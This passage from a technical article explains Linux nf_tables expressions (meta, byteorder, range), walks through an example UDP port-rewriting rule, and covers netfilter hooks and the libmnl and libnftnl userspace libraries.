This expression allows you to play around with packet metadata.
struct nft_meta {
	enum nft_meta_keys	key:8;
	u8			len;
	union {
		u8		dreg;
		u8		sreg;
	};
};

As you can see it can be used in two ways. The first one is to get the metadata from the packet and write it into the registers - when dreg is used. The other way to use it is to get metadata from the registers and write it to the packet - when sreg is used.
What metadata is going to be maniupulated depends on the key being used.
/**
 * enum nft_meta_keys - nf_tables meta expression keys
 *
 * @NFT_META_LEN: packet length (skb->len)
 * @NFT_META_PROTOCOL: packet ethertype protocol (skb->protocol), invalid in OUTPUT
 * @NFT_META_PRIORITY: packet priority (skb->priority)
 * @NFT_META_MARK: packet mark (skb->mark)
 * @NFT_META_IIF: packet input interface index (dev->ifindex)
 * @NFT_META_OIF: packet output interface index (dev->ifindex)
 * @NFT_META_IIFNAME: packet input interface name (dev->name)
 * @NFT_META_OIFNAME: packet output interface name (dev->name)
 * @NFT_META_IIFTYPE: packet input interface type (dev->type)
 * @NFT_META_OIFTYPE: packet output interface type (dev->type)
 * @NFT_META_SKUID: originating socket UID (fsuid)
 * @NFT_META_SKGID: originating socket GID (fsgid)
 * @NFT_META_NFTRACE: packet nftrace bit
 * @NFT_META_RTCLASSID: realm value of packet's route (skb->dst->tclassid)
 * @NFT_META_SECMARK: packet secmark (skb->secmark)
 * @NFT_META_NFPROTO: netfilter protocol
 * @NFT_META_L4PROTO: layer 4 protocol number
 * @NFT_META_BRI_IIFNAME: packet input bridge interface name
 * @NFT_META_BRI_OIFNAME: packet output bridge interface name
 * @NFT_META_PKTTYPE: packet type (skb->pkt_type), special handling for loopback
 * @NFT_META_CPU: cpu id through smp_processor_id()
 * @NFT_META_IIFGROUP: packet input interface group
 * @NFT_META_OIFGROUP: packet output interface group
 * @NFT_META_CGROUP: socket control group (skb->sk->sk_classid)
 * @NFT_META_PRANDOM: a 32bit pseudo-random number
 * @NFT_META_SECPATH: boolean, secpath_exists (!!skb->sp)
 * @NFT_META_IIFKIND: packet input interface kind name (dev->rtnl_link_ops->kind)
 * @NFT_META_OIFKIND: packet output interface kind name (dev->rtnl_link_ops->kind)
 * @NFT_META_BRI_IIFPVID: packet input bridge port pvid
 * @NFT_META_BRI_IIFVPROTO: packet input bridge vlan proto
 * @NFT_META_TIME_NS: time since epoch (in nanoseconds)
 * @NFT_META_TIME_DAY: day of week (from 0 = Sunday to 6 = Saturday)
 * @NFT_META_TIME_HOUR: hour of day (in seconds)
 * @NFT_META_SDIF: slave device interface index
 * @NFT_META_SDIFNAME: slave device interface name
 */

The meta keys are… a lot.

nft_byteorder 
We will now look at a type of expression that can be used to change the endianness of data.
struct nft_byteorder {
	u8			sreg;
	u8			dreg;
	enum nft_byteorder_ops	op:8;
	u8			len;
	u8			size;
};

The essential parameters are sreg, len and dreg that show from what register we get the data that we are going to perform the action on, how big it is and where we are going to put it.
There is an operation parameter op that can hold two values.

/**
 * enum nft_byteorder_ops - nf_tables byteorder operators
 *
 * @NFT_BYTEORDER_NTOH: network to host operator
 * @NFT_BYTEORDER_HTON: host to network operator
 */
enum nft_byteorder_ops {
	NFT_BYTEORDER_NTOH,
	NFT_BYTEORDER_HTON,
};

The first type of operation is network to host where we convert from network endianness (almost always big-endian) to host endianness - whatever that might be (little-endian on the 8086 family).
The other type of operation is host to network which is the opposite - converts from host endianness to network.

The last parameter is size. This is the size of the integers where the endianness will be changed. It can take a few discrete values - 2, 4 and 8.

nft_range_expr 

This expression is similiar to the compare expression but instead of comparing against a constant value it compares against a constant range.
struct nft_range_expr {
	struct nft_data		data_from;
	struct nft_data		data_to;
	u8			sreg;
	u8			len;
	enum nft_range_ops	op:8;
};

The range is defined by data_from and data_to. The parameters sreg and len define the data we are going to be comparing against the range.
The range is inclusive - including the values passed as data_from and data_to.
The last parameter is the operation op.
/**
 * enum nft_range_ops - nf_tables range operator
 *
 * @NFT_RANGE_EQ: equal
 * @NFT_RANGE_NEQ: not equal
 */
enum nft_range_ops {
	NFT_RANGE_EQ,
	NFT_RANGE_NEQ,
};

If the operation is NFT_RANGE_EQ means that if the data is outside of the range the verdict will be set to NFT_BREAK - meaning that the rest of the expressions in the rule will be skipped and it will continue down the rules in the chain after that. If the operation is NFT_RANGE_NEQ it will set the verdict to NFT_BREAK if the data is inside the (inclusive) range.

Other expressions 
Those are a few of the most commonly used expressions in nf_tables but there are others.
/* include/net/netfilter/nf_tables_core.h */ 
extern struct nft_expr_type nft_counter_type;
extern struct nft_expr_type nft_lookup_type;
extern struct nft_expr_type nft_dynset_type;
extern struct nft_expr_type nft_rt_type;
extern struct nft_expr_type nft_exthdr_type;
extern struct nft_expr_type nft_last_type;
// the ones we talked about are omitted  


An example 
I want to give a quick example of a simple rule and how different expressions might take a part in it.

We are going to make a rule that checks if a UDP packet’s destination port is in the range 50001-50009 and if so changes the destination port to 1337.


  
    
      Expression
      Expression Arguments
      Result of expression
    
  
  
    
      nft_payload
      base = NFT_PAYLOAD_TRANSPORT_HEADER
offset = 2
len = 2
dreg = NFT_REG32_01
      Copies the destination port from the UDP header that is 2 bytes long and is at offset 2 from the start of the UDP header and puts it in 1st register
    
    
      nft_range_expr
      data_from = (u16) 50001
data_to = (u16) 50009
sreg = NFT_REG32_01
len = 2
op = NFT_RANGE_EQ
      Checks if the destination port in the 1st register is in the range 50001-50009
If it isn’t it will set the verdict to NFT_BREAK - skipping the rest of the expressions in the rule
If it is in the range it will continue down the expressions
    
    
      nft_immediate_expr
      data = (u16) 1337
dreg = NFT_REG32_02
len = 2
      Sets the 2nd register to 1337.
    
    
      nft_payload_set
      base = NFT_PAYLOAD_TRANSPORT_HEADER
offset = 2
len = 2
sreg = NFT_REG_02
      Changes the destination port to the value in the 2nd register (1337).
    
  


However we would ultimately want this rule to be triggered only if the packet is incoming… How do we do that?

This is determined by what hook the chain (where the rule is) uses. So let us take a look at the hooks.

The Hooks 
The netfilter hooks define at what point a chain is going to be executed. Is it goint to be when a packet comes into the network? Or is it going to be on its way out?

There are six hooks - ingress, prerouting, input, forward, output, postrouting.
The prerouting and input hooks are triggered by traffic flowing into the network (or the local machine).
The postrouting and output are triggered by traffic flowing out of the network.
If IP forwarding is enabled so your machine can act as a router then the forward hook could also be reached after prerouting.

The last hook is the ingress hook. It is newer than the others (introduced in version 4.2).

The ingress hook is attached to a particular network interface. It can be used to enforce very early filtering policies. The ingress hook would be triggered even before the prerouting one. An important thing that has to be mentioned is - at the stage where this hook resides - the fragmented diagrams have not been reassembled.

So to summarize the possible ways a packet can take are:

  ingress -> prerouting -> input -> application
  application -> output -> postrouting


And if forwarding is enabled the ways a packet can take also includes:

  ingress -> prerouting -> forward -> postrouting


On the nftables wiki a schematic can be found that simplifies stuff a bit.



In the codebase the hooks are defined in the following enum type.
/* include/uapi/linux/netfilter.h */ 

enum nf_inet_hooks {
	NF_INET_PRE_ROUTING,
	NF_INET_LOCAL_IN,
	NF_INET_FORWARD,
	NF_INET_LOCAL_OUT,
	NF_INET_POST_ROUTING,
	NF_INET_NUMHOOKS,
	NF_INET_INGRESS = NF_INET_NUMHOOKS,
};


The Libraries - libmnl and libnftnl 
It is time to take a very quick look at the two libraries that significantly simplify the process of working with nf_tables.

libmnl 

  libmnl is a minimalistic user-space library oriented to Netlink developers. There are a lot of common tasks in parsing, validating, constructing of both the Netlink header and TLVs that are repetitive and easy to get wrong. This library aims to provide simple helpers that allows you to re-use code and to avoid re-inventing the wheel.


This is the description provided in the documentation. In the libmnl repository you wil find some examples on the use of the library. While not well documented it could be understood to a degree through those examples.

libnftnl 
This is a userspace library that essentially provides an API to nf_tables. It is crucial when working with nf_tables. It requires libmnl to function.

In the libnftnl repository you can find a lot of good examples showing you how to use the library. They are more than enough to give you a solid understanding.

In include/linux/netfilter/nf_tables.h in the repository you can find all of the parameter names (and enum values) for all of the expressions. This file is include/uapi/linux/netfilter/nf_tables.h from the kernel tree.

Closing remarks 
Ultimately I hope this article can provide you with a solid understanding of nf_tables. I hope I saved some people precious hours that they would otherwise pour into researching nf_tables.

Credit to David Bouman for his write up that gave me the base knowledge that I needed to take a deeper look and ultimately write this article.

Expression	Expression Arguments	Result of expression
nft_payload	base = NFT_PAYLOAD_TRANSPORT_HEADER offset = 2 len = 2 dreg = NFT_REG32_01	Copies the destination port from the UDP header that is 2 bytes long and is at offset 2 from the start of the UDP header and puts it in 1st register
nft_range_expr	data_from = (u16) 50001 data_to = (u16) 50009 sreg = NFT_REG32_01 len = 2 op = NFT_RANGE_EQ	Checks if the destination port in the 1st register is in the range 50001-50009 If it isn’t it will set the verdict to NFT_BREAK - skipping the rest of the expressions in the rule If it is in the range it will continue down the expressions
nft_immediate_expr	data = (u16) 1337 dreg = NFT_REG32_02 len = 2	Sets the 2nd register to 1337.
nft_payload_set	base = NFT_PAYLOAD_TRANSPORT_HEADER offset = 2 len = 2 sreg = NFT_REG_02	Changes the destination port to the value in the 2nd register (1337).